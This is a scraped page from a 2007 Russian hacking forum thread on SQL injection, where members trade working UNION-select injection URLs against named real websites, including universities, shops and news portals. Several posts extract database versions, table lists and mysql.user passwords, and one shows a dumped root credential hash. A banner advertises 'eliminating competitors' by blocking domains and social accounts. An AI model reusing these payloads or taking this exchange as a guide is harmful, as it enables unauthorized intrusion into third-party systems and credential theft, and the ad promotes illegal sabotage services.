Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 105 из 1242

105

Опции темы

Поиск в этой теме

Опции просмотра

#1041

15.03.2007, 16:16

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

Отправить сообщение для Colkru с помощью ICQ

Код:

http://www.sra.org/opportunities_detail.php?id=-1+union+select+1,2,3,convert(concat(user,char(58),password)+using+latin1),5,6,7,8+from+mysql.user+limit+0,1/*

root:6ae787f828f13555
________

Код:

http://www.actionscript.org/showMovie.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

На форуме 52,878 юзеров зарегано)))А на данный момент(время редактирования поста) находится на форуме 522 человек)))
_______
Microchip.by:

Код:

http://www.microchip.by/info.php?id=-1+union+select+1,2,3,version(),5/*

Последний раз редактировалось Colkru; 15.03.2007 в 16:35..

#1042

15.03.2007, 16:38

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

2 Ksander
там может и нет таблицы юзеров... ведь корзина, судя по всему, кукисы юзает, а не авторизацию.. да и админки я там не видел.
вот аналогичный случай:

Код:

http://www.fightbeat.com/article_detail.php?AT=-1+union+select+1,2,3,4,5,6,7,8/*

#1043

15.03.2007, 16:56

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

PHP код:


		
			
http://zona.bloudil.cz/index.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9/*

#1044

15.03.2007, 17:09

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

Цитата:

Сообщение от Ksander

Странное колличество колонок:

Код:

http://www.travelonline.ru/act.php?pg=shop_razdel&cat2=5&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

"странное" в плане чего? 8о
Вывод в тайтле если что

#1045

15.03.2007, 17:18

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Код:

http://emotive.ru/shop/index.php?CID=-1+union+select+1,version()+from+admin/*

Последний раз редактировалось Ksander; 15.03.2007 в 17:55..

#1046

15.03.2007, 17:35

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Код:

http://www.intellectpro.ru/news/index.php?oper=view&news_id=-1+union+select+1,table_name,3+from+information_schema.tables/*

там 350+-50 таблиц, лично мне просматривать все лень

перебрал 50 шт. и забил)

#1047

15.03.2007, 17:58

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

PHP код:


		
			
http://www.selfserviceworld.com/article.php?id=-1+union+select+1,password,3,4,5,6,7,8+from+mysql.user/*

PHP код:


		
			
http://www.antipatriarcat.org/cmcs/titre.php?id=-1+union+select+1,2,3,4,5,6/*

Последний раз редактировалось Colkru; 15.03.2007 в 18:03..

#1048

15.03.2007, 18:35

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://www.onlife.ru/drink.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*

Нашел таблицу с юзверями и админами, а вот имена колонок подобрать не смог:

Код:

http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15,16/*
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+rozvaga_user/*
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+rozvaga_admin/*

#1049

15.03.2007, 18:37

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

http://www.chem.uci.edu/employment/display.employment.faculty.php?id=-6+union+select+1,2,password+from+mysql.user/*

http://artsci.wustl.edu/~acsp/faculty.php?action=person&id=-65+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*

http://www.nsu.ru/psych/business/publication.php?id=-75+union+select+1,2,VERSION(),4,5,6/*

http://www.losingtoday.com/tales.php?id=-132+union+select+1,2,3,4,5,6/*

http://www.best-ipoteka.ru/tales.php?id=-132+union+select+1,2,3,4/*

#1050

15.03.2007, 19:29

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Аллах акбар!

www.islam.ru

Код:

http://www.islam.ru/shop/index.php?cat=46&good=-1+union+select+1,convert(version(),char),3,4,5+from+users/*

Страница 105 из 1242

105

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход